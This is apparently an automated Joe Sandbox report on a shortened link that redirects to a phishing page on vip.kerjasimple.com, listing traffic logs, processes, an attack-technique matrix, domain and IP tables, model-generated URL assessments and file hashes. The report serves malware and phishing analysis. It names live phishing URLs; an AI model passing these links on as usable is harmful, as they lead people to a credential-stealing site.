      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49921 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49946 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49945 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49991 version: TLS 1.2
      Source: classification engineClassification label: mal84.phis.win@17/37@20/11
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2052,i,14813094074098594587,18073620675259000167,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/Bv1rG"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2052,i,14813094074098594587,18073620675259000167,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://t.ly/Bv1rG0%Avira URL Cloudsafe
      https://t.ly/Bv1rG100%SlashNextCredential Stealing type: Phishing & Social usering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://vip.kerjasimple.com/m/jsv.js0%Avira URL Cloudsafe
      https://vip.kerjasimple.com/favicon.ico0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      199.232.214.172
      truefalse
        high
        t.ly
        104.20.7.133
        truefalse
          high
          d2vgu95hoyrpkh.cloudfront.net
          18.245.31.5
          truefalse
            high
            vip.kerjasimple.com
            159.89.194.49
            truetrue
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                cs837.wac.edgecastcdn.net
                192.229.133.221
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      142.250.185.228
                      truefalse
                        high
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            www.w3schools.com
                            unknown
                            unknownfalse
                              high
                              cdn.socket.io
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://vip.kerjasimple.com/m/jsv.jstrue
                                • Avira URL Cloud: safe
                                unknown
                                https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2false
                                  high
                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssfalse
                                    high
                                    https://vip.kerjasimple.com/favicon.icotrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123Ntrue
                                      unknown
                                      https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                        high
                                        https://www.w3schools.com/w3css/4/w3.cssfalse
                                          high
                                          https://t.ly/Bv1rGfalse
                                            high
                                            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2false
                                              high
                                              https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://fontawesome.comchromecache_72.2.drfalse
                                                  high
                                                  https://i.imgur.com/xA8aaXN.pngchromecache_70.2.dr, chromecache_53.2.drfalse
                                                    high
                                                    https://google.comchromecache_71.2.dr, chromecache_68.2.drfalse
                                                      high
                                                      https://fontawesome.com/license/freechromecache_72.2.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.185.228
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        13.107.246.45
                                                        s-part-0017.t-0009.t-msedge.netUnited States
                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        18.245.31.89
                                                        unknownUnited States
                                                        16509AMAZON-02USfalse
                                                        192.229.133.221
                                                        cs837.wac.edgecastcdn.netUnited States
                                                        15133EDGECASTUSfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        18.245.31.5
                                                        d2vgu95hoyrpkh.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        159.89.194.49
                                                        vip.kerjasimple.comUnited States
                                                        14061DIGITALOCEAN-ASNUStrue
                                                        152.199.21.175
                                                        sni1gl.wpc.omegacdn.netUnited States
                                                        15133EDGECASTUSfalse
                                                        104.20.7.133
                                                        t.lyUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.17.25.14
                                                        cdnjs.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        IP
                                                        192.168.2.6
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1554533
                                                        Start date and time:2024-11-12 16:25:57 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 11s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://t.ly/Bv1rG
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal84.phis.win@17/37@20/11
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.185.78, 74.125.206.84, 34.104.35.123, 216.58.212.170, 142.250.185.138, 142.250.186.106, 142.250.185.170, 142.250.185.74, 172.217.16.138, 142.250.185.106, 216.58.206.74, 142.250.186.74, 216.58.212.138, 142.250.186.138, 142.250.184.234, 172.217.16.202, 216.58.206.42, 172.217.23.106, 172.217.18.10, 142.250.184.195, 142.250.185.67, 20.12.23.50, 192.229.221.95, 13.95.31.18, 199.232.214.172, 52.165.164.15, 2.22.50.144, 2.22.50.131, 52.149.20.212, 142.250.186.163
                                                        • Excluded domains from analysis (whitelisted): logincdn.msauth.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com
                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://t.ly/Bv1rG
                                                        No simulations
                                                        InputOutput
                                                        URL: Model: claude-3-5-sonnet-latest
                                                        {
                                                            "typosquatting": false,
                                                            "unusual_query_string": false,
                                                            "suspicious_tld": true,
                                                            "ip_in_url": false,
                                                            "long_subdomain": false,
                                                            "malicious_keywords": false,
                                                            "encoded_characters": false,
                                                            "redirection": true,
                                                            "contains_email_address": false,
                                                            "known_domain": false,
                                                            "brand_spoofing_attempt": false,
                                                            "third_party_hosting": true
                                                        }
                                                        URL: https://t.ly
                                                        URL: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N Model: claude-3-haiku-20240307
                                                        ```json
                                                        {
                                                          "contains_trigger_text": false,
                                                          "trigger_text": "unknown",
                                                          "prominent_button_name": "unknown",
                                                          "text_input_field_labels": "unknown",
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": false,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: Model: claude-3-5-sonnet-latest
                                                        {
                                                            "typosquatting": false,
                                                            "unusual_query_string": false,
                                                            "suspicious_tld": false,
                                                            "ip_in_url": false,
                                                            "long_subdomain": false,
                                                            "malicious_keywords": true,
                                                            "encoded_characters": false,
                                                            "redirection": false,
                                                            "contains_email_address": false,
                                                            "known_domain": false,
                                                            "brand_spoofing_attempt": false,
                                                            "third_party_hosting": true
                                                        }
                                                        URL: https://vip.kerjasimple.com
                                                        URL: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N Model: claude-3-haiku-20240307
                                                        ```json
                                                        {
                                                          "brands": []
                                                        }
                                                        ```
                                                        
                                                        The provided image does not contain any visible brands or logos. The image appears to be a black screen with no discernible content or branding elements.
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                        Category:dropped
                                                        Size (bytes):2407
                                                        Entropy (8bit):7.900400471609788
                                                        Encrypted:false
                                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (2044)
                                                        Category:downloaded
                                                        Size (bytes):4233
                                                        Entropy (8bit):5.182676247770295
                                                        Encrypted:false
                                                        SSDEEP:96:lW+9Jg/k5PG5Py5PevSd++OICtJxtomlGDWtVA24:M+9JUk5e5a5eSdpOICtlomlH4
                                                        MD5:7C8F863C110E8A7F8CD9DCE6D4E9449F
                                                        SHA1:260ED955797213098033E72967A966B9A35B6E73
                                                        SHA-256:4E8990E58D4FC1F5BE51AFE41F579623C93CBA30262ED703CE5DA74373F147B0
                                                        SHA-512:437FD890258891F2454A3D09231454D12FAA99A2B95D0A05FAEC293B5FB683170148FB0AFC590319D3FA8CD37A3E165108DFCEBFC667E6655040FD6D52B80729
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://vip.kerjasimple.com/favicon.ico
                                                        Preview:<html>. <head>. <title>COMING SOON</title>. <body>. <div class="bgimg">. <div class="middle">. <h1>COMING SOON</h1>. <hr>. <p id="demo" style="font-size:30px"></p>. </div>. </div>. <style>. body,. html {. height: 100%;. margin: 0;. }.. .bgimg {. background-image: url("https://i.imgur.com/xA8aaXN.png");. height: 100%;. background-position: center;. background-size: cover;. position: relative;. color: white;. font-family: "Courier New", Courier, monospace;. font-size: 25px;. }.. .topleft {. position: absolute;. top: 0;. left: 16px;. }.. .bottomleft {. position: absolute;. bottom: 0;. left: 16px;. }.. .middle {. position: absolute;. top: 80%;. left: 50%;. transform: translate(-50%, -50%);. text-align: center;. }.. hr {. margin: auto;.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                        Category:dropped
                                                        Size (bytes):276
                                                        Entropy (8bit):7.316609873335077
                                                        Encrypted:false
                                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:dropped
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
